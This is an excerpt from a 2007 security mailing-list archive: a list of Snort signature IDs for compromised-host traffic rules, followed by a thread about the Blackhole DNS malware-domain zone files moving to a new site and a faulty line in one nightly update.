        2500350 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (351) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500351 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (352) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500352 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (353) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500353 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (354) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (256) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (257) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (258) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510258 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (259) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510259 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (260) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510260 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (261) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510261 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (262) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510262 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (263) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510263 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (264) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510264 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (265) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510265 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (266) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510266 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (267) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510267 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (268) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510268 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (269) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510269 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (270) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510270 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (271) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510271 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (272) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510272 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (273) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510273 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (274) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510274 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (275) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510275 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (276) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510276 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (277) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510277 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (278) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510278 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (279) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510279 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (280) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510280 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (281) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510281 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (282) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510282 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (283) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510283 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (284) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510284 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (285) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510285 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (286) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510286 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (287) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510287 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (288) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510288 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (289) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510289 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (290) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510290 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (291) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510291 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (292) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510292 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (293) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510293 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (294) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510294 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (295) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510295 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (296) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510296 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (297) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510297 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (298) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510298 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (299) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510299 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (300) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510300 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (301) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510301 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (302) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510302 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (303) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510303 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (304) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510304 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (305) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510305 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (306) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510306 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (307) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510307 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (308) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510308 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (309) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510309 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (310) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510310 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (311) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510311 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (312) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510312 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (313) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510313 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (314) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510314 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (315) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510315 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (316) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510316 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (317) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510317 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (318) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510318 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (319) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510319 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (320) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510320 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (321) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510321 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (322) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510322 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (323) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510323 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (324) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510324 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (325) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510325 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (326) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510326 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (327) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510327 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (328) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510328 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (329) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510329 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (330) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510330 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (331) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510331 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (332) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510332 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (333) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510333 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (334) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510334 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (335) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510335 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (336) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510336 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (337) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510337 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (338) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510338 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (339) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510339 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (340) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510340 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (341) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510341 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (342) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510342 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (343) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510343 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (344) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510344 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (345) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510345 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (346) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510346 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (347) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510347 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (348) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510348 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (349) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510349 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (350) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510350 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (351) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510351 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (352) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510352 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (353) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510353 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (354) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts

From cunningpike at gmail.com  Wed Dec  5 16:25:18 2007
From: cunningpike at gmail.com (CunningPike)
Date: Wed Dec  5 16:31:54 2007
Subject: [Bleeding-sigs] Blackhole DNS
In-Reply-To: <684018.93262.qm@web52403.mail.re2.yahoo.com>
References: <684018.93262.qm@web52403.mail.re2.yahoo.com>
Message-ID: <4756D0EE.50208@gmail.com>

Hi David,

Did last night's update contain an error?

.....
Dec  5 04:00:09 bind2 named:  failed
Dec  5 04:00:09 bind2 named: /etc/namedb/spyware.zones:18511: zone '':
is not a valid name
.....

CP

David Glosser wrote:
> Due the current uncertainty, the Blackhole DNS files have been moved to
> a new domain:
>  
> http://www.malwaredomains.com/
> Bind format: http://www.malwaredomains.com/files/spywaredomains.zones
> MS "Boot" format: http://www.malwaredomains.com/files/BOOT
> Master "domains.txt" file: http://www.malwaredomains.com/files/domains.txt
>  
> For now, it's just the files themselves. More content and functionality
> will be added in the near future. 
>  
> ---
> I wish to express my thanks to Matt for his work on
> bleedingsnort/bleedingthreats/bleedingedge.
> A few years ago I was a snort newbie who was overwhelmed with keeping
> track of all the signatures.
> Matt's idea to organize and provide structure to the bleeding snort
> rules saved me countless hours of time and stress.
>  
> Matt was also generous enough to host the DNS-BH zone files and
> integrate in his sandnet data to provide true 0-day bleeding-edge
> domains to the dns-bh list. 
>  
> I'm sure I join everyone in wishing him the best of luck and thanks for
> his dedication and his time and efforts in the bleeding-edge community.
>  
>  
> ----
>  
> 
>  
>  
> 
> 
>  
> ----- Original Message ----
> From: Matt Jonkman <jonkman@jonkmans.com>
> To: Bleeding Sigs <bleeding-sigs@bleedingthreats.net>
> Sent: Wednesday, November 21, 2007 4:43:53 AM
> Subject: Re: [Bleeding-sigs] Blackhole DNS
> 
> David decided to move that somewhere else while there's so much
> uncertainty in the project. He'll announce a new home very soon I'm sure.
> 
> matt
> 
> John H. Sawyer wrote:
>> What happened to the DNS blackhole lists?
>>
>> http://www.bleedingthreats.net/blackhole-dns/files/
>>
>> -jhs
>> _______________________________________________
>> Bleeding-sigs mailing list
>> Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>
>> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
> -- 
> --------------------------------------------
> Matthew Jonkman
> Bleeding Edge Threats
> US Phone 765-429-0398
> US Fax 312-264-0205
> AUS Phone 61-42-4157-491
> AUS Fax 61-29-4750-026
> http://www.bleedingthreats.net <http://www.bleedingthreats.net/>
> --------------------------------------------
> 
> PGP: http://www.bleedingthreats.com/mattjonkman.asc
> 
> 
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net <mailto:Bleeding-sigs@bleedingthreats.net>
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
From jason.weir at nhrs.org  Wed Dec  5 16:28:53 2007
From: jason.weir at nhrs.org (Weir, Jason)
Date: Wed Dec  5 16:35:34 2007
Subject: [Bleeding-sigs] Blackhole DNS
In-Reply-To: <4756D0EE.50208@gmail.com>
Message-ID: <F236CDCE34685A458D315422458642E2517E36@pine.nhrs.org>

It sure did..

At line 18511 as your error noted.

Remove that line and all will be fine.

I'm sure David will correct the problem soon..

-Jason

-----Original Message-----
From: bleeding-sigs-bounces@bleedingthreats.net
[mailto:bleeding-sigs-bounces@bleedingthreats.net] On Behalf Of
CunningPike
Sent: Wednesday, December 05, 2007 11:25 AM
To: David Glosser
Cc: listeningpost@bleedingthreats.net; Bleeding Sigs
Subject: Re: [Bleeding-sigs] Blackhole DNS


Hi David,

Did last night's update contain an error?

.....
Dec  5 04:00:09 bind2 named:  failed
Dec  5 04:00:09 bind2 named: /etc/namedb/spyware.zones:18511: zone '':
is not a valid name
.....

CP

David Glosser wrote:
> Due the current uncertainty, the Blackhole DNS files have been moved
to
> a new domain:
>  
> http://www.malwaredomains.com/
> Bind format: http://www.malwaredomains.com/files/spywaredomains.zones
> MS "Boot" format: http://www.malwaredomains.com/files/BOOT
> Master "domains.txt" file:
http://www.malwaredomains.com/files/domains.txt
>  
> For now, it's just the files themselves. More content and
functionality
> will be added in the near future. 
>  
> ---
> I wish to express my thanks to Matt for his work on
> bleedingsnort/bleedingthreats/bleedingedge.
> A few years ago I was a snort newbie who was overwhelmed with keeping
> track of all the signatures.
> Matt's idea to organize and provide structure to the bleeding snort
> rules saved me countless hours of time and stress.
>  
> Matt was also generous enough to host the DNS-BH zone files and
> integrate in his sandnet data to provide true 0-day bleeding-edge
> domains to the dns-bh list. 
>  
> I'm sure I join everyone in wishing him the best of luck and thanks
for
> his dedication and his time and efforts in the bleeding-edge
community.
>  
>  
> ----
>  
> 
>  
>  
> 
> 
>  
> ----- Original Message ----
> From: Matt Jonkman <jonkman@jonkmans.com>
> To: Bleeding Sigs <bleeding-sigs@bleedingthreats.net>
> Sent: Wednesday, November 21, 2007 4:43:53 AM
> Subject: Re: [Bleeding-sigs] Blackhole DNS
> 
> David decided to move that somewhere else while there's so much
> uncertainty in the project. He'll announce a new home very soon I'm
sure.
> 
> matt
> 
> John H. Sawyer wrote:
>> What happened to the DNS blackhole lists?
>>
>> http://www.bleedingthreats.net/blackhole-dns/files/
>>
>> -jhs
>> _______________________________________________
>> Bleeding-sigs mailing list
>> Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>
>>
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
> -- 
> --------------------------------------------
> Matthew Jonkman
> Bleeding Edge Threats
> US Phone 765-429-0398
> US Fax 312-264-0205
> AUS Phone 61-42-4157-491
> AUS Fax 61-29-4750-026
> http://www.bleedingthreats.net <http://www.bleedingthreats.net/>
> --------------------------------------------
> 
> PGP: http://www.bleedingthreats.com/mattjonkman.asc
> 
> 
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
<mailto:Bleeding-sigs@bleedingthreats.net>
>
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
_______________________________________________
Bleeding-sigs mailing list
Bleeding-sigs@bleedingthreats.net
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
From david_glosser at yahoo.com  Wed Dec  5 18:21:42 2007
From: david_glosser at yahoo.com (David Glosser)
Date: Wed Dec  5 18:29:07 2007
Subject: [Bleeding-sigs] Blackhole DNS
Message-ID: <598405.74639.qm@web52404.mail.re2.yahoo.com>

Grrr. Will do it tonite. For some reason my bind didn't bomb. Thanks. 



----- Original Message ----
From: "Weir, Jason" <jason.weir@nhrs.org>
To: Bleeding Sigs <bleeding-sigs@bleedingthreats.net>
Cc: listeningpost@bleedingthreats.net
Sent: Wednesday, December 5, 2007 11:28:53 AM
Subject: RE: [Bleeding-sigs] Blackhole DNS

It sure did..

At line 18511 as your error noted.

Remove that line and all will be fine.

I'm sure David will correct the problem soon..

-Jason

-----Original Message-----
From: bleeding-sigs-bounces@bleedingthreats.net
[mailto:bleeding-sigs-bounces@bleedingthreats.net] On Behalf Of
CunningPike
Sent: Wednesday, December 05, 2007 11:25 AM
To: David Glosser
Cc: listeningpost@bleedingthreats.net; Bleeding Sigs
Subject: Re: [Bleeding-sigs] Blackhole DNS


Hi David,

Did last night's update contain an error?

.....
Dec  5 04:00:09 bind2 named:  failed
Dec  5 04:00:09 bind2 named: /etc/namedb/spyware.zones:18511: zone '':
is not a valid name
.....

CP

David Glosser wrote:
> Due the current uncertainty, the Blackhole DNS files have been moved
to
> a new domain:
>  
> http://www.malwaredomains.com/
> Bind format: http://www.malwaredomains.com/files/spywaredomains.zones
> MS "Boot" format: http://www.malwaredomains.com/files/BOOT
> Master "domains.txt" file:
http://www.malwaredomains.com/files/domains.txt
>  
> For now, it's just the files themselves. More content and
functionality
> will be added in the near future. 
>  
> ---
> I wish to express my thanks to Matt for his work on
> bleedingsnort/bleedingthreats/bleedingedge.
> A few years ago I was a snort newbie who was overwhelmed with keeping
> track of all the signatures.
> Matt's idea to organize and provide structure to the bleeding snort
> rules saved me countless hours of time and stress.
>  
> Matt was also generous enough to host the DNS-BH zone files and
> integrate in his sandnet data to provide true 0-day bleeding-edge
> domains to the dns-bh list. 
>  
> I'm sure I join everyone in wishing him the best of luck and thanks
for
> his dedication and his time and efforts in the bleeding-edge
community.
>  
>  
> ----
>  
> 
>  
>  
> 
> 
>  
> ----- Original Message ----
> From: Matt Jonkman <jonkman@jonkmans.com>
> To: Bleeding Sigs <bleeding-sigs@bleedingthreats.net>
> Sent: Wednesday, November 21, 2007 4:43:53 AM
> Subject: Re: [Bleeding-sigs] Blackhole DNS
> 
> David decided to move that somewhere else while there's so much
> uncertainty in the project. He'll announce a new home very soon I'm
sure.
> 
> matt
> 
> John H. Sawyer wrote:
>> What happened to the DNS blackhole lists?
>>
>> http://www.bleedingthreats.net/blackhole-dns/files/
>>
>> -jhs
>> _______________________________________________
>> Bleeding-sigs mailing list
>> Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>
>>
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
> -- 
> --------------------------------------------
> Matthew Jonkman
> Bleeding Edge Threats
> US Phone 765-429-0398
> US Fax 312-264-0205
> AUS Phone 61-42-4157-491
> AUS Fax 61-29-4750-026
> http://www.bleedingthreats.net <http://www.bleedingthreats.net/>
> --------------------------------------------
> 
> PGP: http://www.bleedingthreats.com/mattjonkman.asc
> 
> 
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
<mailto:Bleeding-sigs@bleedingthreats.net>
>
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
_______________________________________________
Bleeding-sigs mailing list
Bleeding-sigs@bleedingthreats.net
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
_______________________________________________
Bleeding-sigs mailing list
Bleeding-sigs@bleedingthreats.net
http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.bleedingthreats.net/pipermail/bleeding-sigs/attachments/20071205/fc0e832a/attachment.html
From cunningpike at gmail.com  Wed Dec  5 19:27:02 2007
From: cunningpike at gmail.com (CunningPike)
Date: Wed Dec  5 19:33:37 2007
Subject: [Bleeding-sigs] Blackhole DNS
In-Reply-To: <598405.74639.qm@web52404.mail.re2.yahoo.com>
References: <598405.74639.qm@web52404.mail.re2.yahoo.com>
Message-ID: <4756FB86.8090505@gmail.com>

Thanks, David!

CP

David Glosser wrote:
> Grrr. Will do it tonite. For some reason my bind didn't bomb. Thanks.
> 
> 
>  
> ----- Original Message ----
> From: "Weir, Jason" <jason.weir@nhrs.org>
> To: Bleeding Sigs <bleeding-sigs@bleedingthreats.net>
> Cc: listeningpost@bleedingthreats.net
> Sent: Wednesday, December 5, 2007 11:28:53 AM
> Subject: RE: [Bleeding-sigs] Blackhole DNS
> 
> It sure did..
> 
> At line 18511 as your error noted.
> 
> Remove that line and all will be fine.
> 
> I'm sure David will correct the problem soon..
> 
> -Jason
> 
> -----Original Message-----
> From: bleeding-sigs-bounces@bleedingthreats.net
> <mailto:bleeding-sigs-bounces@bleedingthreats.net>
> [mailto:bleeding-sigs-bounces@bleedingthreats.net
> <mailto:bleeding-sigs-bounces@bleedingthreats.net>] On Behalf Of
> CunningPike
> Sent: Wednesday, December 05, 2007 11:25 AM
> To: David Glosser
> Cc: listeningpost@bleedingthreats.net
> <mailto:listeningpost@bleedingthreats.net>; Bleeding Sigs
> Subject: Re: [Bleeding-sigs] Blackhole DNS
> 
> 
> Hi David,
> 
> Did last night's update contain an error?
> 
> .....
> Dec  5 04:00:09 bind2 named:  failed
> Dec  5 04:00:09 bind2 named: /etc/namedb/spyware.zones:18511: zone '':
> is not a valid name
> .....
> 
> CP
> 
> David Glosser wrote:
>> Due the current uncertainty, the Blackhole DNS files have been moved
> to
>> a new domain:
>> 
>> http://www.malwaredomains.com/
>> Bind format: http://www.malwaredomains.com/files/spywaredomains.zones
>> MS "Boot" format: http://www.malwaredomains.com/files/BOOT
>> Master "domains.txt" file:
> http://www.malwaredomains.com/files/domains.txt
>> 
>> For now, it's just the files themselves. More content and
> functionality
>> will be added in the near future.
>> 
>> ---
>> I wish to express my thanks to Matt for his work on
>> bleedingsnort/bleedingthreats/bleedingedge.
>> A few years ago I was a snort newbie who was overwhelmed with keeping
>> track of all the signatures.
>> Matt's idea to organize and provide structure to the bleeding snort
>> rules saved me countless hours of time and stress.
>> 
